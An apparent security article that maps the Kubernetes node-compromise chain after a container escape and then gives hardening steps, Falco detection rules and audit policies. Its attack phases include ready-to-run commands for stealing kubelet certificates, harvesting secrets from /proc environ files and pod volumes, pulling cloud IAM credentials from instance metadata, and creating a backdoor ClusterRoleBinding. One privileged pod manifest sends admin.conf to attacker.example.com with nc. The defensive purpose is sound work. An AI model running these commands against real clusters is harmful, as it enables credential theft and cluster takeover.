From Pod Breakout to Kubelet Credential Theft: The Node Compromise Attack Chain

From Pod Breakout to Kubelet Credential Theft: The Node Compromise Attack Chain

The Problem

Getting code execution inside a container is not the end of the attack — it is the beginning. For most attackers, the container is an entry point into the Kubernetes node, and the node is an entry point into the cluster. The post-escape attack chain is well-understood, repeatable, and fast: from an escaped container to cluster-level API access in under five minutes on a default Kubernetes installation. Yet most Kubernetes security tooling focuses on preventing the initial escape and treats post-escape activity as out of scope.

This article maps the full attack chain from the attacker’s perspective, starting the clock at the moment of container escape. The initial escape mechanism — whether CVE-2022-0847 (Dirty Pipe), runc CVE-2019-5736, or a straightforward --privileged pod misconfiguration — does not substantially change what happens next. What matters is that the attacker now has code execution on the host as root. Everything that follows is determined by what Kubernetes leaves on the node filesystem, and by default Kubernetes leaves a great deal.

The attack proceeds in six phases: establish node access and confirm the environment, harvest the kubelet’s TLS credentials, enumerate the cluster using the node’s API server identity, extract secrets from co-located pod processes, steal cloud IAM credentials from the instance metadata service, and escalate to cluster-admin. Each phase uses artifacts that Kubernetes places on every node by design. None of this is novel. All of it works on a default cluster with no additional misconfiguration beyond the initial container escape.

Phase 1: Establish Node Access and Confirm the Environment

The first actions after escape confirm the attacker is on the node rather than still inside a container, and identify the target environment:

# Confirm we are on the node, not inside a container
# A container shows /docker/<id> or /kubepods/... in cgroup hierarchy
cat /proc/1/cgroup | head -5
# On the node host, cgroup[0] looks like:
# 12:cpuset:/
# 11:memory:/system.slice/kubelet.service
# Not: 12:cpuset:/kubepods/burstable/pod<uid>/<containerid>

# Kubelet data directory confirms Kubernetes node
ls /var/lib/kubelet/
# config.yaml  kubeconfig  pki/  plugins/  pods/  ...

# Kernel version — useful for identifying additional LPE opportunities
uname -r

# Node name — used later to correlate which pods are scheduled here
hostname
# ip-10-0-1-142.eu-west-1.compute.internal

# Cloud provider detection
curl -s -m 2 http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null && echo "AWS"
curl -s -m 2 -H "Metadata-Flavor: Google" http://metadata.google.internal/ 2>/dev/null && echo "GCP"

The cgroup check is the most reliable escape confirmation. Container processes appear under /kubepods/ in the cgroup hierarchy; a process with /system.slice/kubelet.service in its cgroup is running as a host service, not inside a container namespace.

Phase 2: Harvest Kubelet Credentials

The kubelet authenticates to the Kubernetes API server using TLS client certificates. These certificates are stored on the node filesystem by design — the kubelet needs them on every startup. They are the most valuable artifact on the node:

# Kubelet TLS credentials directory
ls -la /var/lib/kubelet/pki/
# -rw------- 1 root root 2794 May  1 09:14 kubelet-client-2026-05-01-09-14-32.pem
# lrwxrwxrwx 1 root root   67 May  1 09:14 kubelet-client-current.pem -> /var/lib/kubelet/pki/kubelet-client-2026-05-01-09-14-32.pem
# -rw-r--r-- 1 root root 2187 Apr 18 12:04 kubelet.crt
# -rw------- 1 root root 1675 Apr 18 12:04 kubelet.key

# kubelet-client-current.pem contains both private key and certificate in one PEM file
# This single file is sufficient to authenticate as the node identity to the API server
cat /var/lib/kubelet/pki/kubelet-client-current.pem

The kubelet-client-current.pem file is a symlink to the most recently rotated credential. It contains the private key and certificate concatenated in a single PEM file. The certificate’s Subject is CN=system:node:<nodename>,O=system:nodes — this is the identity the API server recognises.

Also check for a kubeconfig, which often contains the API server address in a form that is more convenient than reconstructing it:

# Kubelet kubeconfig — contains API server address and CA certificate
cat /var/lib/kubelet/kubeconfig
# server: https://10.0.0.1:6443  ← note this address

# API server CA certificate — needed to verify the server's TLS certificate
ls /etc/kubernetes/pki/ca.crt
# Or sometimes at:
ls /var/lib/kubelet/pki/ca.crt

Verify the credentials work before exfiltrating them. A working authentication confirms the node identity is valid and gives a baseline of what the API server is willing to discuss:

APISERVER=$(cat /var/lib/kubelet/kubeconfig | grep server | awk '{print $2}')
CERT=/var/lib/kubelet/pki/kubelet-client-current.pem
CACERT=/etc/kubernetes/pki/ca.crt

# Test authentication — should return node list if the node identity has access
curl -s \
  --cert $CERT \
  --key $CERT \
  --cacert $CACERT \
  $APISERVER/api/v1/nodes/$(hostname) \
  | python3 -m json.tool | head -20

A successful response confirms the credentials are valid and the API server is reachable from the node (it always is — the kubelet talks to it continuously). If the CA cert is not at /etc/kubernetes/pki/ca.crt, check /etc/kubernetes/ssl/, /etc/ssl/certs/kubernetes/, or read the certificate-authority-data field from the kubeconfig and base64-decode it.

Phase 3: Enumerate the Cluster Using the Node Identity

The node identity system:node:<nodename> in the system:nodes group has permissions granted by the Node Authorizer, a dedicated Kubernetes authorization mode. These permissions are documented but often not fully understood by cluster operators:

KUBECTL="kubectl --client-certificate=$CERT --client-key=$CERT --certificate-authority=$CACERT --server=$APISERVER"

# What can this identity actually do?
$KUBECTL auth can-i --list 2>/dev/null | grep -v "^no\b" | head -30
# Resources                     Non-Resource URLs   Resource Names   Verbs
# nodes                         []                  [ip-10-0-1-142]  [get patch update]
# pods                          []                  []               [get list watch]
# secrets                       []                  []               [get]
# services                      []                  []               [get list watch]
# endpoints                     []                  []               [get list watch]
# configmaps                    []                  []               [get list watch]
# ...

# List all pods on this specific node across all namespaces
$KUBECTL get pods --all-namespaces \
  --field-selector spec.nodeName=$(hostname) \
  -o wide

The Node Authorizer — enabled with --authorization-mode=Node,RBAC in the API server — restricts what node identities can do. But the permitted scope is still significant: the node identity can get and list pods scheduled to its node, read secrets that are mounted into pods on its node, and read configmaps and service account tokens used by those pods. The critical restriction is that the node identity cannot list secrets cluster-wide — only secrets that are referenced by pods on that specific node. In practice this is a large set of secrets, because every pod that runs on this node has mounted some secret, and the node identity can read all of them through the API.

# Get detailed info on a specific pod to identify mounted secrets
$KUBECTL get pod -n production payment-service-7d9f8c-xkp2q -o json \
  | python3 -m json.tool \
  | grep -A5 '"secretName"'
# "secretName": "payment-service-db-creds"
# "secretName": "tls-cert-prod"

# Read a mounted secret directly through the API
$KUBECTL get secret payment-service-db-creds -n production -o json \
  | python3 -c "
import json, sys, base64
s = json.load(sys.stdin)
for k, v in s['data'].items():
    print(f'{k}: {base64.b64decode(v).decode()}')
"
# DB_HOST: prod-postgres.internal:5432
# DB_PASSWORD: xK9mP2qR8nL4vT7w

The Node Authorizer limits secret access to secrets bound to pods on this node — but there is no limit on the number of pods that can be on a node, and a busy production node running 40 pods may have 40 distinct secret objects accessible.

Phase 4: Extract Secrets from Co-Located Pod Processes

The API-based approach requires knowing which secrets are mounted. A complementary approach reads secrets directly from the kernel’s process address space without touching the Kubernetes API at all. This bypasses audit logging at the API server level entirely:

# Scan /proc/<pid>/environ for all running processes
# Covers every process on the node, including containers, host services, and kube-system pods
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
  environ_file=/proc/$pid/environ
  if [ -f "$environ_file" ]; then
    env=$(cat "$environ_file" 2>/dev/null | tr '\0' '\n')
    if echo "$env" | grep -qE "AWS_|GITHUB_TOKEN|DATABASE_URL|DB_PASS|SECRET|TOKEN|KEY|PASSWD|PASSWORD"; then
      comm=$(cat /proc/$pid/comm 2>/dev/null)
      cgroup=$(cat /proc/$pid/cgroup 2>/dev/null | head -1)
      echo "=== PID $pid ($comm) ==="
      echo "cgroup: $cgroup"
      echo "$env" | grep -E "AWS_|GITHUB_TOKEN|DATABASE_URL|DB_PASS|SECRET|TOKEN|KEY|PASSWD|PASSWORD"
      echo ""
    fi
  fi
done

The /proc/<pid>/environ file is readable by root and contains the complete environment of the process at the time it was launched. Environment variables are a common — and persistent — way to inject secrets into containerised processes: database passwords, API tokens, AWS credentials, JWT signing keys, Stripe keys, SendGrid API keys. Any secret injected as a Kubernetes Secret via env[].valueFrom.secretKeyRef ends up in the process environment and is readable through this path.

# Additional method: read mounted secrets from the kubelet's pod volume directory
# The kubelet stores secret volume contents on the host filesystem
find /var/lib/kubelet/pods -type f \( -name "*.token" -o -name "token" -o -name "*.key" -o -name "ca.crt" \) 2>/dev/null

# Service account tokens for all pods on this node are here:
find /var/lib/kubelet/pods -path "*/secrets/token" 2>/dev/null \
  | while read f; do
      pod_uid=$(echo $f | awk -F/ '{print $6}')
      echo "=== Pod UID: $pod_uid ==="
      cat "$f"
      echo ""
    done

Service account tokens found in /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/<name>/token are valid JWT tokens that authenticate to the Kubernetes API with the service account’s permissions. A service account with ClusterRoleBinding to cluster-admin — which exists in many clusters for Helm operators, monitoring tools, or CI deployments — gives cluster-admin access.

Decode and inspect any token to understand its permissions:

TOKEN=$(cat /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/default-token-xxxxx/token)

# Decode the JWT payload (base64url, no signature verification needed for inspection)
echo $TOKEN | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | python3 -m json.tool
# {
#   "iss": "kubernetes/serviceaccount",
#   "kubernetes.io/serviceaccount/namespace": "monitoring",
#   "kubernetes.io/serviceaccount/service-account.name": "prometheus",
#   ...
# }

# Test what this service account can do
kubectl --token="$TOKEN" --server=$APISERVER --certificate-authority=$CACERT auth can-i --list

Phase 5: Cloud IMDS Credential Theft

If the cluster runs on a cloud provider, the instance metadata service (IMDS) is accessible from the node. Unlike pod-level IMDS access (which can be blocked at the network level with hop-limit controls), access from the node itself is always permitted — the node needs IMDS to function:

# AWS: get IAM role credentials
# First, identify the role name
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
echo "IAM Role: $ROLE"

# Get the temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# {
#   "Code": "Success",
#   "Type": "AWS-HMAC",
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "...",
#   "Token": "...",
#   "Expiration": "2026-05-09T06:22:00Z"
# }

# GCP: get the default service account access token
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# {"access_token":"ya29....","expires_in":3599,"token_type":"Bearer"}

# Also: get all scopes the service account has
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

# Azure: get an access token for Azure Resource Manager
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# {"access_token":"eyJ0...","client_id":"...","expires_in":"86391",...}

The node’s IAM role is typically broader than pod IAM roles: nodes need EC2 permissions to describe their own instance, ECR permissions to pull images, EBS permissions for persistent volume management, and often CloudWatch permissions for logging. In EKS clusters, the node’s IAM role is frequently misconfigured with excessive permissions because it is the same role used by managed node groups.

With AWS credentials, check for EKS-specific escalation paths:

export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# What identity is this?
aws sts get-caller-identity
# {
#   "UserId": "AROA...:i-0abc12345def67890",
#   "Account": "123456789012",
#   "Arn": "arn:aws:sts::123456789012:assumed-role/eks-node-role/i-0abc12345def67890"
# }

# Can this role update the aws-auth ConfigMap via SSM or direct IAM?
aws iam list-attached-role-policies --role-name eks-node-role

# Check if the node role can access ECR (image pull) — which means it can push malicious images
aws ecr get-login-password --region eu-west-1 | \
  docker login --username AWS --password-stdin 123456789012.dkr.ecr.eu-west-1.amazonaws.com

# Check what S3 buckets are accessible — state files, backups, secrets
aws s3 ls

# EKS-specific: update cluster access config to add cluster-admin entry
# (requires eks:UpdateClusterConfig permission, sometimes present on node role)
aws eks update-access-entry \
  --cluster-name production-cluster \
  --principal-arn arn:aws:iam::123456789012:role/attacker-role \
  --kubernetes-groups system:masters

Phase 6: Escalate to Cluster-Admin

The collected materials — node identity cert, service account tokens, cloud IAM credentials — now provide multiple paths to cluster-admin:

# Path 1: Find a co-located pod with a cluster-admin service account
$KUBECTL get pods --all-namespaces \
  --field-selector spec.nodeName=$(hostname) \
  -o json | \
  python3 -c "
import json, sys
pods = json.load(sys.stdin)['items']
for p in pods:
    sa = p['spec'].get('serviceAccountName','default')
    ns = p['metadata']['namespace']
    name = p['metadata']['name']
    anns = p['metadata'].get('annotations', {})
    iam_role = anns.get('iam.amazonaws.com/role') or anns.get('eks.amazonaws.com/role-arn')
    print(f'{ns}/{name}: sa={sa}' + (f' iam={iam_role}' if iam_role else ''))
"

# Path 2: Use a stolen cluster-admin token to create a backdoor ClusterRoleBinding
ADMIN_TOKEN=$(cat /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/cluster-admin-token/token)

kubectl --token="$ADMIN_TOKEN" --server=$APISERVER --certificate-authority=$CACERT \
  create clusterrolebinding backdoor-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:attacker

# Path 3: With node identity, create a malicious pod in kube-system
# Node authorizer does NOT allow creating pods — but the node cert + a stolen token might
# Use the highest-privilege token found to create a privileged pod
kubectl --token="$ADMIN_TOKEN" --server=$APISERVER --certificate-authority=$CACERT \
  apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: breakout
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  containers:
    - name: shell
      image: ubuntu:22.04
      command: ["/bin/bash", "-c", "nsenter -t 1 -m -u -i -n -- bash -c 'cat /etc/kubernetes/admin.conf | nc attacker.example.com 4444'"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: host
      hostPath:
        path: /
EOF

Threat Model

What the node identity can access. The system:node:<nodename> identity in the system:nodes group is authorized by the Node Authorizer. It can get and list pods scheduled to its node, get the secrets and configmaps referenced by those pods, get service account tokens bound to its pods, and update its own node object. It cannot list secrets cluster-wide, access pods on other nodes, or read cluster-level resources not bound to its pods. In practice, a busy production node with 40-60 pods has access to 40-60 secret objects through the API, all of which may contain production credentials.

What /proc exposes. Every process running on the node — including all container processes, which run in their own PID namespace but are still visible in /proc from the host — has an environ file readable by root. The host is root after a container escape. Process environments routinely contain database passwords, API keys, OAuth tokens, S3 credentials, and signing keys. This is not a Kubernetes-specific issue; it is the reality of secret injection into containerised processes. The /proc path bypasses Kubernetes audit logging entirely: no API call, no audit event, no detection signal outside of eBPF or Falco syscall tracing.

What IMDS exposes. The cloud instance metadata service is available from the node without authentication for IMDSv1. IMDSv2 requires a PUT request to obtain a session token, but from the node (not from a container with hop-limit enforcement), this is trivially satisfied. The node IAM role typically has ECR pull permissions (often allowing push as well), CloudWatch put-log-events permissions, and EC2 describe permissions at minimum. In many organisations it also has access to S3 buckets containing Terraform state, which contains secrets.

Multi-tenant blast radius. In a multi-tenant cluster where different teams share nodes, a container escape from one team’s workload gives the attacker access to the secrets of every other team’s pods co-located on the same node. This is the argument for hard tenancy: separate node groups per tenant, with pod anti-affinity rules ensuring tenant isolation at the node level. Without it, the blast radius of a single container escape spans the entire cluster.

Persistence mechanisms. After achieving cluster-admin access, an attacker can persist in multiple ways: create a ClusterRoleBinding granting a new service account cluster-admin; deploy a DaemonSet to every node with a persistent backdoor; modify the kube-system/aws-auth ConfigMap (EKS) to add a backdoor IAM role; push a malicious image to the cluster’s registry and modify a Deployment to pull it. Because kubelet certificate rotation creates new certificates, the stolen kubelet cert has a limited validity window (typically 24-72 hours for rotated certs), but any higher-level access obtained with it persists until explicitly revoked.

Hardening Configuration

1. Enable and Verify the NodeRestriction Admission Plugin

The NodeRestriction admission plugin restricts what kubelet API calls are allowed from node identities. Without it, the node identity has unconstrained access to the API server using the system:nodes RBAC bindings:

# Verify NodeRestriction is enabled in the API server
ps aux | grep kube-apiserver | tr ' ' '\n' | grep admission
# --enable-admission-plugins=NodeRestriction,PodSecurity,...

# Or check the manifest
cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep admission-plugins

Even with NodeRestriction enabled, verify what the node identity can actually do — the effective permissions matter, not just the plugin’s presence:

# From the node, using the kubelet cert, check effective permissions
kubectl --client-certificate=/var/lib/kubelet/pki/kubelet-client-current.pem \
        --client-key=/var/lib/kubelet/pki/kubelet-client-current.pem \
        --certificate-authority=/etc/kubernetes/pki/ca.crt \
        --server=$(cat /var/lib/kubelet/kubeconfig | grep server | awk '{print $2}') \
        auth can-i --list 2>&1 | \
        grep -E "^(secrets|pods|configmaps|nodes)" | \
        awk '{print $1, $NF}'

Any entry showing secrets [] [get] with a wildcard namespace is a misconfiguration — secrets access should be restricted to secrets bound to pods on this specific node.

2. Protect Kubelet PKI File Permissions

The kubelet credential files are the primary escalation artifact. Their permissions must be verified and enforced continuously:

# Audit kubelet PKI permissions on a single node
find /var/lib/kubelet/pki -maxdepth 1 \( -name "*.pem" -o -name "*.key" -o -name "*.crt" \) \
  -exec stat --format="%a %U %G %n" {} \; | \
  awk '$1 != "600" || $2 != "root" || $3 != "root" { print "INSECURE: " $0 }'

# Fleet-wide check via SSH or your node management tooling
for node in $(kubectl get nodes -o jsonpath='{.items[*].metadata.name}'); do
  ssh "$node" "find /var/lib/kubelet/pki -name '*.pem' -o -name '*.key' | xargs stat --format='%a %n' | awk '\$1 != \"600\" {print \"$node: INSECURE: \" \$0}'"
done

Enforce permissions via the kubelet’s systemd service configuration. The kubelet creates these files, so modifying kubelet permissions is the correct layer:

# /etc/systemd/system/kubelet.service.d/50-pki-permissions.conf
[Service]
ExecStartPost=/bin/bash -c 'chmod 600 /var/lib/kubelet/pki/*.pem /var/lib/kubelet/pki/*.key 2>/dev/null; chown root:root /var/lib/kubelet/pki/*.pem /var/lib/kubelet/pki/*.key 2>/dev/null; true'

For non-root container escapes (which are possible without Dirty Pipe on clusters with properly configured user namespaces), world-readable kubelet keys are exploitable. Even with root-only permissions, the post-escape attacker has root, so this is defence-in-depth against non-root escape paths.

3. Block Cloud IMDS from Pod Network Namespaces

Blocking IMDS access from pods prevents an escaped container from using IMDS before achieving host-level access. After a full node escape, the attacker has host-level IMDS access regardless — but blocking at the pod level raises the bar:

# Block pod access to IMDS using iptables on each node
# This applies to all network namespaces that are NOT the host namespace
# Add to node bootstrap or DaemonSet configuration

# AWS IMDS
iptables -I FORWARD -d 169.254.169.254/32 -j DROP
iptables -I FORWARD -d fd00:ec2::254/128 -j DROP  # IPv6 IMDS

# GCP metadata server
iptables -I FORWARD -d 169.254.169.254/32 -j DROP  # same IP
iptables -I FORWARD -d metadata.google.internal -j DROP

# Make persistent across reboots
iptables-save > /etc/iptables/rules.v4

For AWS, the strongest control is IMDSv2 with hop limit 1. This means the token-fetching PUT request must come from the instance itself (TTL 1) — containers running in their own network namespace cannot satisfy this, because the packet traverses an additional routing hop:

# Require IMDSv2 and set hop limit 1 on all nodes
# Best done at node launch time via instance configuration in the node group's launch template

aws ec2 modify-instance-metadata-options \
  --instance-id $(curl -s http://169.254.169.254/latest/meta-data/instance-id) \
  --http-put-response-hop-limit 1 \
  --http-endpoint enabled \
  --http-tokens required

# Verify the configuration
aws ec2 describe-instances \
  --instance-ids $(curl -s http://169.254.169.254/latest/meta-data/instance-id) \
  --query 'Reservations[0].Instances[0].MetadataOptions'
# {
#   "State": "applied",
#   "HttpTokens": "required",
#   "HttpPutResponseHopLimit": 1,
#   "HttpEndpoint": "enabled"
# }

With HttpPutResponseHopLimit: 1 and HttpTokens: required, a container trying to access IMDS receives a 401 on the PUT token request because the packet traverses the container’s network namespace to the host’s namespace — two hops. The host can still access IMDS directly.

4. Enable Kubelet Certificate Rotation and Set Short Validity

Certificate rotation reduces the window during which a stolen kubelet cert remains usable. With rotation enabled, the kubelet automatically requests a new certificate before the current one expires:

# Verify certificate rotation is configured in kubelet config
cat /var/lib/kubelet/config.yaml | grep -E "rotate|serverTLS"
# rotateCertificates: true
# serverTLSBootstrap: true

# Check current certificate expiry
openssl x509 -in /var/lib/kubelet/pki/kubelet-client-current.pem \
  -noout -dates -subject
# notBefore=May  1 09:14:32 2026 GMT
# notAfter=Jun  1 09:14:32 2026 GMT  ← 30-day validity (default)
# subject=CN = system:node:ip-10-0-1-142.eu-west-1.compute.internal, O = system:nodes

# Verify CSR approval is working (should show approved/issued CSRs)
kubectl get csr | grep "node-csr" | head -5

The default certificate validity is 1 year for bootstrap certs. Reduce this to 24 hours using a custom certificate signer:

# kube-controller-manager configuration
# --cluster-signing-duration=24h
# This affects all certificates signed by the cluster CA

# Verify current setting
kubectl -n kube-system get pod kube-controller-manager -o yaml | \
  grep cluster-signing-duration

A 24-hour certificate validity means a stolen kubelet cert becomes invalid the next day, limiting the window for credential reuse.

5. Falco Detection Rules for Post-Escape Activity

Falco instructs the kernel via eBPF probes to detect the specific syscall patterns that characterise each phase of the post-escape chain:

# /etc/falco/rules.d/post-escape-detection.yaml

- rule: Kubelet PKI read by non-kubelet process
  desc: >
    A process other than kubelet is reading kubelet TLS credentials.
    The kubelet PKI directory should only be accessed by the kubelet process itself.
    Any other reader — including shell scripts, curl, or cp — indicates credential theft
    following a container escape.
  condition: >
    open_read and
    fd.name startswith "/var/lib/kubelet/pki" and
    not proc.name in (kubelet, kubeadm, kube-apiserver)
  output: >
    Kubelet PKI accessed by unexpected process
    (proc=%proc.name pid=%proc.pid user=%user.name
    file=%fd.name cmdline=%proc.cmdline parent=%proc.pname)
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, kubelet]

- rule: Cross-process environ read
  desc: >
    A process is reading the environment variables of another process via /proc/<pid>/environ.
    This is the primary mechanism for harvesting secrets injected as environment variables
    into co-located containers after a node compromise.
  condition: >
    open_read and
    fd.name glob "/proc/*/environ" and
    not proc.name in (ps, top, htop, glances, systemd, auditd, falco, containerd, dockerd) and
    not container.id = host
  output: >
    Cross-process environ read — possible credential harvesting
    (proc=%proc.name pid=%proc.pid user=%user.name
    target_pid=%fd.name cmdline=%proc.cmdline)
  priority: HIGH
  tags: [container-escape, credential-theft, proc-filesystem]

- rule: IMDS access from container process
  desc: >
    A process inside a container is directly accessing the cloud instance metadata service.
    With IMDSv2 and hop limit 1, this should fail, but the attempt itself is anomalous
    and indicates reconnaissance following a partial escape or misconfiguration.
  condition: >
    (evt.type = connect or evt.type = sendto) and
    container and
    (fd.sip = "169.254.169.254" or fd.sip = "fd00:ec2::254")
  output: >
    IMDS access from container — possible cloud credential theft attempt
    (container=%container.name image=%container.image.repository
    pid=%proc.pid user=%user.name cmdline=%proc.cmdline)
  priority: HIGH
  tags: [container-escape, imds, cloud-credentials]

- rule: kubectl used with kubelet certificate
  desc: >
    kubectl is being invoked with explicit client certificate flags pointing to the
    kubelet PKI directory. This is the exact invocation pattern used to enumerate
    the cluster using a stolen kubelet identity.
  condition: >
    spawned_process and
    proc.name = kubectl and
    (proc.args contains "kubelet-client" or
     proc.args contains "/var/lib/kubelet/pki")
  output: >
    kubectl invoked with kubelet certificates
    (pid=%proc.pid user=%user.name cmdline=%proc.cmdline
    parent=%proc.pname pparent=%proc.aname[2])
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, lateral-movement]

- rule: Kubelet pod secret volume traversal
  desc: >
    A process is traversing /var/lib/kubelet/pods looking for token files.
    This path contains the mounted secrets and service account tokens for all
    pods on the node, and should only be accessed by the kubelet and container runtime.
  condition: >
    open_read and
    fd.name glob "/var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*" and
    not proc.name in (kubelet, containerd, containerd-shim, dockerd, runc)
  output: >
    Kubelet pod secret volume accessed by unexpected process
    (proc=%proc.name pid=%proc.pid user=%user.name
    file=%fd.name cmdline=%proc.cmdline)
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, service-account-token]

Deploy and validate:

# Copy rules and reload
cp /etc/falco/rules.d/post-escape-detection.yaml /etc/falco/rules.d/
falco --validate /etc/falco/rules.d/post-escape-detection.yaml

# Reload without restart
kill -USR1 $(pgrep falco)

# Test the PKI rule fires correctly
# (from a test environment, not production)
sudo cat /var/lib/kubelet/pki/kubelet-client-current.pem > /dev/null
# Should trigger: "Kubelet PKI accessed by unexpected process (proc=bash ...)"

6. API Server Audit Policy for Node Identity Abuse

The Kubernetes audit log captures every API server request. Configure alert rules to detect node identity accessing resources outside its normal operating pattern:

# /etc/kubernetes/audit-policy.yaml — add these rules
# These generate audit events for anomalous node identity API calls

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log all secret access by node identities at the Request level
  # Normal kubelet secret access is via the Node Authorizer for bound secrets only
  # Any secret access by a node identity deserves a log entry
  - level: Request
    users: ["system:node:*"]
    resources:
      - group: ""
        resources: ["secrets"]
    verbs: ["get", "list", "watch"]

  # Log all API calls made using node identity with elevated verbs
  # Creates, updates, and deletes by node identities are extremely unusual
  - level: RequestResponse
    users: ["system:node:*"]
    verbs: ["create", "update", "patch", "delete", "deletecollection"]

  # Log auth can-i calls — attackers enumerate permissions after credential theft
  - level: Request
    nonResourceURLs: ["/apis/authorization.k8s.io/*"]
    users: ["system:node:*"]

In your SIEM, alert on:

# Splunk query — node identity listing secrets across multiple namespaces
index=k8s_audit
  user.username="system:node:*"
  verb IN ("list", "get")
  objectRef.resource="secrets"
| stats dc(objectRef.namespace) as namespaces by user.username, sourceIPs{}
| where namespaces > 1

A legitimate kubelet reads secrets only in namespaces of pods scheduled to its node. A single node identity reading secrets across more than one or two namespaces in a short window is anomalous. A node identity that calls auth can-i --list is almost certainly an attacker — the kubelet never needs to enumerate its own permissions.

Expected Behaviour

Falco alert on kubelet PKI access. When the post-escape attacker runs cat /var/lib/kubelet/pki/kubelet-client-current.pem, Falco generates within milliseconds:

09:47:32.441083234: Critical Kubelet PKI accessed by unexpected process
(proc=bash pid=38471 user=root
file=/var/lib/kubelet/pki/kubelet-client-current.pem
cmdline=cat /var/lib/kubelet/pki/kubelet-client-current.pem
parent=sh)

This event should page on-call immediately. There is no legitimate administrative reason for a non-kubelet process to read these files — the kubelet reads its own credentials at startup, and kubeadm reads them only during cluster bootstrap operations. Any other reader is anomalous.

IMDS block with hop limit 1. A container process attempting IMDSv2 IMDS access receives:

$ curl -s -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# No output — connection refused or 401
# The PUT packet traversed two hops (container net ns -> host net ns -> IMDS)
# and was dropped because hop limit is 1

Correctly restricted node identity. With NodeRestriction enabled and a correctly configured cluster, kubectl auth can-i --list as the node identity returns:

Resources                     Non-Resource URLs   Resource Names                 Verbs
nodes                         []                  [ip-10-0-1-142.eu-west-1...]   [get patch update]
pods/status                   []                  []                             [update patch]

It does not show secrets [] [] [get] with a wildcard — secrets access should be scoped to specific named resources, and an attacker trying to kubectl get secret arbitrary-secret-name -n other-namespace receives Error from server (Forbidden).

Certificate rotation reducing credential window. With 24-hour certificate validity, the stolen kubelet-client-current.pem stops working within one rotation cycle. After the kubelet renews, the stolen cert’s serial is no longer valid:

curl --cert /tmp/stolen-kubelet.pem \
     --key /tmp/stolen-kubelet.pem \
     --cacert /etc/kubernetes/pki/ca.crt \
     https://APISERVER:6443/api/v1/nodes
# {"kind":"Status","status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}

Trade-offs

IMDSv2 hop limit 1 breaks any workload that legitimately needs IMDS access from within a container, such as legacy applications that use the EC2 metadata service for configuration discovery rather than environment variables. The transition to hop limit 1 requires auditing all workloads for IMDS usage and migrating them to pod-level IAM (IRSA on EKS, Workload Identity on GKE) before enforcing the restriction. Applications using the AWS SDK v2 handle IMDSv2 transparently; applications using older SDKs or raw HTTP calls to IMDS may need code changes.

Falco /proc/*/environ rule generates false positives from legitimate observability tools. Datadog, New Relic, and Dynatrace agents enumerate /proc/<pid>/environ to discover process-level metadata and tags. The rule’s condition includes not container.id = host, which means host-side agents are excluded — but containerised agent sidecars or DaemonSet-based agents may still trigger it. Tune with not proc.name in (datadog-agent, newrelic-infra, dynatrace-oneagent, ...) based on your observability stack. Start the rule at WARNING priority, baseline for a week, then promote to CRITICAL with a tuned allowlist.

24-hour certificate validity requires the CSR approval infrastructure to be working continuously. If the kube-controller-manager’s certificate signer is unavailable for more than the certificate validity period, kubelet certificates expire and nodes stop functioning. This is a real operational risk: during a control plane incident, automatic certificate renewal may fail, and with 24-hour certs, nodes begin failing faster than with 1-year certs. Monitor CSR approval latency and alert if CSRs remain pending for more than 15 minutes. Consider 7-day validity as a middle ground that meaningfully reduces the credential theft window without creating operational fragility.

Kubelet pod secret volume Falco rule will fire on container runtime operations. During normal pod startup, containerd-shim and runc access /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/ to mount the secret into the container’s filesystem. The allowlist not proc.name in (kubelet, containerd, containerd-shim, dockerd, runc) covers the standard container runtimes. If you use cri-o or another runtime, add its process name to the allowlist or the rule fires on every pod start.

Failure Modes

Assuming NodeRestriction prevents all node identity abuse. The NodeRestriction plugin limits some access patterns but does not eliminate the node identity as an attack vector. The node identity still has access to all secrets mounted into pods on its node through the normal API path. In a cluster with 50 pods per node across 20 namespaces, the node identity has access to a significant fraction of production secrets — by design. NodeRestriction prevents the node identity from accessing secrets on other nodes or arbitrary cluster resources, but the local node’s secrets are fully accessible. Do not treat NodeRestriction as equivalent to eliminating the node identity’s blast radius.

Not blocking IMDS at the network level. Relying solely on IMDSv2 configuration at the application layer does not protect against a node-level escape. IMDSv2 hop limit controls restrict container-level IMDS access, but once the attacker has escaped to the node, they have host-level network access and can call IMDS directly with a one-hop request. The protection that matters post-escape is the IAM role’s permission scope, not the IMDS configuration. Audit node IAM roles for excessive permissions — a node role that can assume other IAM roles, access production S3 buckets, or manage cluster authentication (like writing to the aws-auth ConfigMap via SSM Parameter Store) turns a node compromise into a full account compromise.

No audit logging for node identity API calls. The Kubernetes audit log is disabled or set to None level for node identity requests in many default cluster configurations, because node identities make high-volume routine API calls (watch pods, watch configmaps). When the audit policy excludes node identity API calls for performance reasons, the entire Phase 3 of the attack chain — cluster enumeration via the node identity — generates no audit events. The secret reads from the API server happen in silence. Configure the audit policy to log node identity requests for sensitive resource types (secrets, tokens) at Request level, even if routine watch calls are excluded.

